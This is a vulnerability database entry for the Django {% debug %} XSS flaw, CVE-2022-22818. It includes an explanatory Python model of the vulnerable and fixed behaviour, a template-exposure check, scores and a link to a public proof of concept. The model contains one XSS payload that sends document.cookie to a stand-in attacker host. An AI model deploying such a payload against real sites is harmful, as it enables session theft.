CVE-2022-22818

MEDIUM

Django < 2.2.27 - XSS

Title source: rule

Description

The {% debug %} template tag in Django 2.2 before 2.2.27, 3.2 before 3.2.12, and 4.0 before 4.0.2 does not properly encode the current context. The tag dumps the template context (every variable the view passed in) into the page without HTML-escaping it, so a context value an attacker controls, such as a request parameter the view echoes into the context, is rendered as markup. This may lead to XSS on any page whose template contains the tag. The patched releases HTML-escape the tag's output.
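The mechanism, as an added example that is not Django's own code: the two render functions below are stand-alone reconstructions of the idea behind the tag's node (pretty-print each context layer, and, in the fix, HTML-escape the result). Django's autoescaping applies to variable output, not to what a tag node returns, so a tag that emits raw text is responsible for escaping it itself. The payload string, context dict and template sources are constructed for the demo; `templates_using_debug` is a hypothetical helper for finding the tag in a code base, not a Django API.

```python
"""Model of CVE-2022-22818: the {% debug %} context dump as an XSS sink,
and the patched (escaped) behaviour. Reconstruction for illustration,
not Django's code."""
import re
from html import escape
from pprint import pformat

# Constructed attacker-controlled value: imagine it arrived in a GET
# parameter that the view then placed in the template context.
PAYLOAD = '<script>document.location="https://evil.invalid/?c="+document.cookie</script>'

# A Django Context is a stack of dicts; one layer is enough here (constructed).
CONTEXT = [{'query': PAYLOAD, 'user': 'alice'}]


def render_debug_vulnerable(context):
    """Pre-fix behaviour: pformat() each layer and concatenate, unescaped.
    A tag node's return value is inserted into the page as-is."""
    return ''.join(pformat(layer) for layer in context)


def render_debug_fixed(context):
    """Patched behaviour: the same dump, but every layer is HTML-escaped,
    so '<', '>', quotes and '&' can no longer form markup."""
    return ''.join(escape(pformat(layer)) for layer in context)


def contains_raw_script(html):
    """Crude sink check: does a literal <script> tag survive in the output?"""
    return '<script>' in html


# Matches the tag with or without surrounding whitespace: {% debug %}, {%debug%}
DEBUG_TAG = re.compile(r'{%\s*debug\s*%}')


def templates_using_debug(template_sources):
    """Exposure check (hypothetical helper): return the names of templates
    that contain {% debug %}. Takes a {name: source} dict so it runs without
    touching the filesystem; in practice feed it the contents of every
    template in the project."""
    return sorted(name for name, src in template_sources.items()
                  if DEBUG_TAG.search(src))


if __name__ == '__main__':
    print('vulnerable output contains <script>:',
          contains_raw_script(render_debug_vulnerable(CONTEXT)))
    print('fixed output contains <script>:',
          contains_raw_script(render_debug_fixed(CONTEXT)))
    sources = {'search.html': '<p>{% debug %}</p>',
               'base.html': '{{ content }}'}
    print('templates to review:', templates_using_debug(sources))
```

The practical check for an affected deployment is the last function: if no template in the project uses the tag, the vulnerable code path is never reached; if any does, the fix is to upgrade to 2.2.27, 3.2.12 or 4.0.2 and to remove the tag from anything that serves untrusted users.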

Exploits (1)

nomisec WORKING POC 3 stars
by Prikalel · poc
https://github.com/Prikalel/django-xss-example

Scores

CVSS v3 6.1
EPSS 0.0101
EPSS Percentile 77.2%
Attack Vector NETWORK
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Details

CWE
CWE-79
Status published
Products (4)
debian/debian_linux 11.0
djangoproject/django 2.2 - 2.2.27
fedoraproject/fedora 35
pypi/Django 2.2 - 2.2.27
Published Feb 03, 2022
Tracked Since Feb 18, 2026